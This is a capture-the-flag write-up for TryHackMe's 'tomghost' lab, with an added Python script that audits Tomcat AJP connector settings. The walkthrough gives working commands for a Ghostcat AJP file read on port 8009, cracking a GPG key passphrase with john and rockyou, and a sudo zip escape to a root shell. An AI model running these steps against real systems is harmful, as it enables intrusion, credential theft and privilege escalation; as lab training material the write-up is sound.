TryHackMe tomghost Writeup
This is a writeup for tomghost CTF from TryHackMe.
My target IP is 10.10.7.100
NMAP
sudo nmap -sS -sV -A 10.10.7.100
Four ports are open; Apache Tomcat 9.0.3 seems interesting.
EXPLOIT
After some research, I found this exploit:
Let's try it and look for common files.
python3 ajpShooter.py http://10.10.7.100:8080/ 8009 /WEB-INF read
python3 ajpShooter.py http://10.10.7.100:8080/ 8009 /WEB-INF/web.xml read
We got our user and password.
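The AJP connector on port 8009 was reachable from the network, which is what made the step above possible. As an added example (not part of the original writeup), here is a small Python audit of a Tomcat server.xml that flags an AJP connector bound to all interfaces or lacking a shared secret, with a constructed weak config beside a hardened one; secretRequired and secret are the AJP connector attributes introduced in Tomcat 9.0.31.

```python
# Added example (not from the original writeup): audits a Tomcat server.xml
# for an AJP connector exposed the way the target above was (port 8009
# reachable from the network). Both sample configs are constructed.
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp(server_xml: str) -> list[str]:
    """Return one finding per weakness found on each AJP <Connector>."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        if "AJP" not in conn.get("protocol", "").upper():
            continue
        port = conn.get("port", "?")
        addr = conn.get("address")
        # No address attribute means the connector listens on every interface.
        if addr is None or addr not in LOOPBACK:
            findings.append(f"AJP connector on port {port} binds to "
                            f"{addr or 'all interfaces'}; set address=\"127.0.0.1\"")
        # Tomcat 9.0.31+ refuses AJP requests without a shared secret unless
        # secretRequired="false" is set explicitly; either way, flag it.
        no_secret = not conn.get("secret")
        if conn.get("secretRequired", "true").lower() == "false" or no_secret:
            findings.append(f"AJP connector on port {port} has no shared secret; "
                            f"set secret=\"...\" or remove the connector if unused")
    return findings


WEAK_CONFIG = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

HARDENED_CONFIG = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET"/>
  </Service>
</Server>"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_ajp(cfg) or ["no findings"])
```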
SSH AND USER FLAG
There are both a key file and a file encrypted with that key. We can try to decrypt it.
gpg --import tryhackme.asc
gpg --list-secret-keys
gpg --output ./creds.txt --decrypt ./credential.pgp
I will use John the Ripper (JTR) to recover the required passphrase. Copy the PGP key in tryhackme.asc to a file on your desktop, use gpg2john to convert it to a hash and crack it with john.
gpg2john pgp.asc > pgp.txt
john --wordlist=rockyou.txt pgp.txt
Now that we have the passphrase, we can enter it and open the creds.txt we created.
It contains another user and its password, probably for SSH. I will log in as merlin.
We got the user flag. Now let's see whether we can get root access.
ROOT FLAG
First, I will check which commands we can run as root.
Apparently we can run the zip command. Let's check GTFOBins for a possible privilege escalation.
I will try this.
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
It worked and we got the root flag.